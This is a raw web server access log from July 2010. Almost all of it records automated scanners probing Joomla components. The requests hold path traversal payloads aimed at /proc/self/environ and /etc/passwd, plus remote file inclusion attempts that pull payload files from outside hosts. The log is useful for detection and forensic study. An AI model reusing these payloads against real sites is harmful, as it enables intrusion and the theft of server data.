83.149.110.213 - - [26/Jul/2010:10:16:16 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:46 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:46 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:46 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:17:46 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:18:17 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:10:18:18 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
64.15.156.75 - - [26/Jul/2010:10:18:38 +0200] "GET /logs/access_log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 342 "-" "Mozilla/5.0"
64.15.156.75 - - [26/Jul/2010:10:18:38 +0200] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 329 "-" "Mozilla/5.0"
64.15.156.75 - - [26/Jul/2010:10:18:38 +0200] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 324 "-" "Mozilla/5.0"
64.15.156.75 - - [26/Jul/2010:10:21:58 +0200] "GET /logs/access_log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 340 "-" "Mozilla/5.0"
208.80.193.42 - - [26/Jul/2010:10:34:08 +0200] "GET / HTTP/1.0" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar 4.5.1.0; FunWebProducts; (R1 1.5))"
72.11.162.136 - - [26/Jul/2010:10:35:06 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
67.195.112.178 - - [26/Jul/2010:10:42:41 +0200] "GET /logs/?C=S;O=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
99.198.108.74 - - [26/Jul/2010:10:54:54 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:54:54 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:55:42 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:55:42 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:10:55:47 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:55:47 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:55:48 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:55:49 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:10:57:49 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:10:58:14 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:10:58:21 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:10:58:21 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
91.121.67.226 - - [26/Jul/2010:10:59:47 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:11:00:03 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:11:00:07 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
83.169.23.182 - - [26/Jul/2010:11:00:26 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:11:00:26 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:00:37 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:00:37 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:11:00:43 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:11:00:43 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:11:00:47 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:11:00:47 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
91.121.7.123 - - [26/Jul/2010:11:00:47 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:00:48 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
99.198.108.74 - - [26/Jul/2010:11:00:48 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:11:00:54 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:11:03:10 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:03:10 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:03:11 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
38.108.124.28 - - [26/Jul/2010:11:04:09 +0200] "GET /logs/access_log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:04:09 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:04:09 +0200] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:47 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:47 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:05:04 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:05:04 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:05:04 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
74.55.73.74 - - [26/Jul/2010:11:08:54 +0200] "GET //index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
81.21.78.22 - - [26/Jul/2010:11:09:09 +0200] "GET /logs/access_log//index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:09 +0200] "GET //index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:09 +0200] "GET /logs//index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:16 +0200] "GET //index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:18 +0200] "GET /logs/access_log//index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:19 +0200] "GET //index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:19 +0200] "GET /logs//index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:09:32 +0200] "GET //index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
83.149.110.213 - - [26/Jul/2010:11:10:36 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:36 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:38 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:38 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:40 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:40 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:42 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:10:42 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
74.55.73.74 - - [26/Jul/2010:11:11:46 +0200] "GET /logs/access_log//index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:11:46 +0200] "GET //index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:11:46 +0200] "GET /logs//index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:14:55 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
81.21.78.22 - - [26/Jul/2010:11:15:16 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:16:53 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:16:54 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:16:54 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.127.248.175 - - [26/Jul/2010:11:17:42 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:17:43 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:17:43 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:17:45 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:17:45 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:17:46 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
76.242.100.234 - - [26/Jul/2010:11:18:51 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
217.172.180.33 - - [26/Jul/2010:11:19:25 +0200] "GET /logs//showinphoto.php?pid=../../../../../../../../etc/passwd HTTP/1.0" 404 307 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
89.207.74.195 - - [26/Jul/2010:11:19:45 +0200] "GET /logs/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 335 "-" "libwww-perl/5.805"
89.207.74.195 - - [26/Jul/2010:11:19:45 +0200] "GET /!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 330 "-" "libwww-perl/5.805"
76.242.100.234 - - [26/Jul/2010:11:20:05 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:11:20:06 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
89.207.74.195 - - [26/Jul/2010:11:20:38 +0200] "GET /logs/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 335 "-" "libwww-perl/5.805"
89.207.74.195 - - [26/Jul/2010:11:20:39 +0200] "GET /!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 330 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:22:11 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:22:12 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:22:12 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:11:22:30 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:22:30 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:22:30 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:11:23:56 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:23:56 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:23:57 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:24:06 +0200] "GET //index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:25:18 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
74.55.73.74 - - [26/Jul/2010:11:26:00 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:26:00 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:26:00 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:27:25 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:27:26 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:11:28:09 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:11:28:49 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:11:28:49 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
222.124.193.12 - - [26/Jul/2010:11:29:57 +0200] "GET /logs//index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:29:58 +0200] "GET //index.php?option=com_lovefactory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
